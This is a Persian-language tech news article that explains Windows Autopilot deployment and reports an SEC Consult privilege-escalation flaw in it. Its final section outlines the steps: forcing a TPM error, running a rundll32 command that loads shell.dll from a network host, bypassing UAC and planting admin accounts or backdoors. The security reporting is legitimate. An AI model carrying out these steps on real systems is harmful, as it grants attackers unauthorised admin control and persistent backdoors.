about-3 back-contact back-deep eitaa کانال روبیکاخبرگزاری سایبربان
مطالب پربازدید
آماده‌سازی
1404/09/11 - 08:18- تروریسم سایبری

آماده‌سازی رژیم صهیونیستی در حوزه فناوری برای جنگ احتمالی بعدی با ایران

رژیم صهیونیستی در حال آماده‌سازی طیف جدیدی از سلاح‌ها و فناوری‌های جدید برای جنگ بعدی با ایران است.

هشدار
1404/09/24 - 10:47- تروریسم سایبری

هشدار رژیم صهیونیستی درمورد حملات سایبری نگران‌کننده ایران

مدیرکل اداره ملی سایبری رژیم صهیونیستی درمورد حملات ایران و احتمال جنگ سایبری هولناک هشدار داد.

هشدار
1404/10/01 - 10:44- جنگ سایبری

هشدار روزنامه اسرائیلی درباره جنگ سایبری با ایران

روزنامه اسرائیلی معاریو پس از یک سری حملات هکری علیه شخصیت‌های ارشد سیاسی و نهادهای دولتی، درباره جنگ سایبری با ایران و تشدید نفوذها هشدار داد.

انتشار شده در تاریخ

ویندوز اتوپایلوت

Windows Autopilot تحولی جدید برای نصب، تنظیم مجدد و نصب مجدد رایانه‌ها بر پایه فضای ابری است.

به گزارش کارگروه فناوری اطلاعات سایبربان ؛ Windows Autopilot تحولی جدید برای نصب، تنظیم مجدد و نصب مجدد رایانه‌ها بر پایه فضای ابری است. کاربران می‌توانند بدون کمک متخصصان فناوری اطلاعات، اعمال مذکور را انجام دهند. این سامانه امکان نصب بر روی شبکه و کنترل و مدیریت آن را نیز دارد.
حالت نصب خودکار این سامانه، امکان نصب سیستم عامل شخصی‌سازی شده را بدون دخالت کاربر می‌دهد. این بدان معناست که یک ویندوز کاملا طراحی شده با تنظیمات شخصی امکان نصب روی تعداد زیادی سیستم را نیز خواهد داشت. برای دستگاه‌هایی با اتصال شبکه داخلی نیازی به مداخله کاربر نیست و این کار توسط مدیر شبکه اتفاق می‌افتد و همه کاربران می توانند از تنظیماتی یکسان، بهره‌مند شوند.
این ویژگی از طریقWi-Fi نیز قابل اجرا است. برای این کار، کافیست اتصال به شبکه انجام ‌شود.
حالت نصب خودکار، از طریق اتصال به فضای ابری، روند زیر را طی می‌کند:


دستگاه به Azure Active Directory متصل شده و همه خط مشی‌ها، برنامه‌ها، گواهینامه‌ها و نمایه‌های شبکه، در دستگاه جدید مورد نظر ارائه می‌شوند. امکان استفاده از دستگاه تا زمان کامل شدن فرایند وجود نخواهد داشت. حالت خودآرایی به کاربر امکان استفاده از ویندوز 10 شخصی خود را بر روی یک کیوسک، دستگاه امضای دیجیتال یا یک دستگاه مشترک می‌دهد.

 


الزامات


حالت خودآرایی، از سخت‌افزار TPM 2.0 و برای تأیید اعتبار دستگاه از Azure AD  Microsoft استفاده می‌کند. بنابراین، دستگاه‌ها ضمن دارا بودن TPM 2.0 باید از آن پشتیبانی کنند. روند تأیید TPM همچنین نیاز به دسترسی به مجموعه‌ای ازآدرس‌های URL HTTPS دارد که برای هر فروشنده TPM به صورت اختصاصی ارائه می‌شود. 


مزایای سامانه نصب اتوماتیک ویندوز

  •   اتصال سریع به فضای ابری
  •     آماده‌سازی خیلی سریع دستگاه شخصی
  •    کنترل کامل روند نصب
  •   آماده سازی سریع دستگاه‌های جدید

 

پشتیبانی از دستگاه‌های موجود


این سامانه با پشتیبانی از همه دستگاه‌های موجود، امکان استفاده سریع از پروفایل شخصی و برنامه‌های نصب شده بر روی سیستم شخصی را بر روی هر دستگاهی می‌دهد.


آماده سازی اشتراکی


برای پیکربندی و راه اندازی کامل دستگاه می‌توان از شرکا یا متخصصان IT کمک گرفت.


بازنشانی اطلاعات


در این ویژگی می‌توان پرونده‌ها، برنامه‌ها و تنظیمات شخصی را حذف و دستگاه را به تنظیمات اصلی خود برگرداند چرا که همه آنها در Azure AD ذخیره شده و این حذف تأثیری بر آنها نمی‌گذارد. این ویژگی انتقال دستگاه به کاربر دیگر را تسهیل می‌کند.


سیستم ایمنی


این بخش اطمینان حاصل می‌کند که کاربران فقط با دستگاه‌های کاملاً پیکربندی شده‌ای که تمام شرایط ایمنی آن برآورده شده، کار می‌کنند.


آسیب پذیری در Microsoft Autopilot امکان کنترل سیستم را به شما می‌دهد


محققان امنیتی شرکت اتریشی SEC Consult از یک آسیب‌پذیری خطرناک در ابزار استقرار دستگاه‌ها در شبکه‌های شرکتی Microsoft Autopilot  پرده برداشته و تاکید کردند که بهره برداری از آن امکان کنترل سیستم رایانه‌ای هدف را می‌دهد.
این مسئله بر روند نصب این سامانه خودکار تأثیر گذاشته و به هکر یا کاربر اجازه می‌دهد سطح دسترسی خود را به سطح مدیر محلی برساند. این نفوذ حتی اگر قوانین و تنظیمات پروفایل(نمایه) سامانه خودکار، مشخص و محدود شده باشد نیز امکان‌پذیر است.
اولین قدم برای استفاده از این آسیب‌پذیری، فعال‌کردن دستگاه است. دستگاه در ابتدا خطا می‌دهد. خطای سیستم با حذف فیزیکی دستگاه امنیتیTPM ، یعنی قطع ارتباط آن از ماشین مجازی، به صورت دستی برطرف می‌شود. در این حالت، نصب به صورت ناموفق و ناقص انجام خواهد شد.
حال نفوذ به گونه‌ای است که هنگامی که پنجره‌ای با یک پیام خطا باز می‌شود، باید بر روی دکمه ViewDiagnostics کلیک کرده و سپس از پوشه  Rundll32.exe \\ 10.0.0.1 \ shell.dll، DLLMain را انتخاب کنید. با فعال شدن این گزینه، مهاجم به عنوان کاربر پیش فرضdefaultuser0  متصل می‌شود. اکنون این کاربر از حقوق مدیر برخوردار است.
برای دور زدن سیستمUAC   نیز، متخصصان از StoreFileSys استفاده کردند و توانایی ایجاد یک کاربر محلی با حقوق مدیر یا پیاده‌سازی سایر درب‌پشتی‌ها را داشتند. در این مسیر نیز دستگاه دوباره به شبکه محلی متصل شده، نصب نرم‌افزار از سر گرفته می‌شود و تا پایان با موفقیت ادامه می یابد. حال  user defaultuser0حذف می‌شود، اما کاربران محلی که قبلا ایجاد شده بودند حذف نمی‌شوند.
علی‌رغم انکار این آسیب‌پذیری توسط مایکروسافت، متخصصان کد (سند اثبات جرم) PoC را برای این آسیب‌پذیری به مایکروسافت ارائه دادند.
 

منبع:

تازه ترین ها
پیش‌بینی
1404/11/17 - 17:24- هوش مصنوعي

پیش‌بینی خطر زوال عقل و سرطان توسط هوش مصنوعی

محققان دانشگاه ماساچوست، یک مدل هوش مصنوعی برای پیش‌بینی سن، خطر زوال عقل، جهش‌های توموری و سرطان، رونمایی کرده‌اند.

جدال بنیان‌گذار تلگرام با نخست‌وزیر اسپانیا

پدرو سانچز ادعاهای پاول دوروف مبنی بر اینکه ممنوعیت رسانه‌های اجتماعی، آزادی‌های آنلاین را تهدید می‌کند، رد کرد.

بررسی ممنوعیت استفاده کودکان از رسانه‌های اجتماعی در آلمان

حزب دموکرات مسیحی آلمان محدودیت‌های سنی برای استفاده از رسانه‌های اجتماعی برای افراد زیر ۱۶ سال را بررسی می‌کند.